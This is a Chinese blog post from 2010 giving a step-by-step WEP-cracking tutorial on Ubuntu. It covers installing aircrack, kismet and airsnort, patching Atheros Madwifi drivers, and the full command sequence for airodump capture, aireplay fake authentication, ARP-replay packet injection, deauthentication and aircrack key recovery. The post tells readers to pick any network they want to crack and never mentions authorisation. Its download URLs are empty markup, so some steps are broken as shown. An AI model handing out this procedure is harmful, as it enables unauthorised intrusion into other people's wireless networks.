Chinaunix首页 | 论坛 | 博客
  • 博客访问: 317728
  • 博文数量: 82
  • 博客积分: 1530
  • 博客等级: 上尉
  • 技术积分: 771
  • 用 户 组: 普通用户
  • 注册时间: 2010-04-16 03:44
文章分类

全部博文(82)

文章存档

2011年(6)

2010年(76)

我的朋友

分类: 网络与安全

2010-05-26 04:21:08

sudo gedit /etc/apt/sources.list 

加入 
## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.) 
deb [url=][color=#0066cc][/color][/url] hardy free non-free 
deb-src [url=][color=#0066cc][/color][/url] hardy free non-free 

保存文件、退出编辑器。敲入如下命令: 

sudo apt-get install build-essential 
sudo apt-get install aircrack 
sudo apt-get install kismet 
sudo apt-get install airsnort 
sudo apt-get install linux-source 
sudo apt-get install linux-headers 
sudo apt-get install sharutils 

完成后,为Madwifi驱动打补丁。 

这个地方可能会有点复杂。我的无线网卡(Linksys WPC55AG)用的是Atheros驱动,我需要对之打补丁。如果你的驱动和我的不同,你需要研究一下是否需要为驱动打补丁,是否甚至可以和 Aircrack套件协同工作。Aircrack-ng.org的论坛是一个用来测试的好地方,当然了,google search也是的。如果你的网卡也是Atheros的,我们称之为ath0,那么,在终端窗口敲入iwconfig,会出现一行字符,显示以太网控制器是Atheros Communications…… 

我们来打补丁。当发现硬盘旧的驱动时,会暂时让你的无线网卡无法工作。先进入/usr/src目录,下载新的驱动、删掉老驱动,然后安装新驱动,并打上补丁。你可以把以下代码拷贝粘贴到终端: 


sudo -i 
cd /usr/src 
wget [url=][color=#0066cc][/color][/url] 
wget [url=][color=#0066cc][/color][/url] 
ifconfig ath0 down 
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal 
find /lib/modules -name ‘ath*’ -exec rm -v {} \; 
find /lib/modules -name ‘wlan*’ -exec rm -v {} \; 
tar zxvf madwifi-cvs-20051025.tar.gz 
cd madwifi 
patch -Np1 -i ../madwifi-cvs-20051025.patch 
make && make install 
modprobe ath_pci 

如果你用的是Atheros驱动,接下来我们旧需要配置kismet了。如果你用的是其它驱动,就必须看你所使用的语法。首先进入Kismet配置,然后改变源代码行。 

sudo gedit /etc/kismet/kismet.conf 


把以“source=”打头的代码行变为“source=madwifi_ag,ath0,madwifi”,重启计算机。重启后你将可以通过无线网卡访问英特网。 


现在我们开始破解。打开一个终端窗口,进入监控模式,运行ksimet。 

sudo airmon start ath0 
sudo kismet 

找到你想要破解的无线网络,需要注意其ESSID和通道,然后敲Ctrl-C退出。 

接下来运行airodump。 

sudo airodump ath0 filename channel# 1 


文件名随你意,可以作为ivs文件存在你的home目录下,或者存在你运行命令的任何目录下。 

从airodump中拷贝无线网络的bssid,具体做法是选中后敲Shift+Ctrl+C。打开一个新的终端窗口,以便我们可以运行 aireplay,开始注入数据包,导致数据量上升。我们想要airodump中的数据栏显示在10万到40万之间。数据包越多,aircrack就可以越快地找到WEP密钥。如果WEP密钥是128位的,我们可能需要多达100万个数据包。 

sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0 


应该把网络和无线连接联系起来。如果总是超时,你需要离无线路由器更近,或通过“sudo iwconfig ath0 rate 1M”改变接口速率。 

接下来我们想开始注入数据包。 

sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0 

起初只是读取数据包,并且报告0个ARP请求、发送0个数据包。只需要等一两分钟,就会开始大量发送数据包了。如果返回文本,并报告说已经被削弱了,那么敲Ctrl+C,重新运行命令。可以通过敲入下面这条命令来加速任何事情: 


sudo aireplay -0 ath0 -a BSSID ath0 

否则就只坐等事情慢慢进行吧。随着数据包开始被发送,Airodump中的数据栏就开始飙升。等到收到了预期数量的数据包,打开一个新的终端窗口,运行aircrack。 

sudo aircrack filename.ivs 


一分钟后,aircrack应该返回WEP密钥。如果没有返回,那就继续回收更多的数据包。
阅读(2535) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~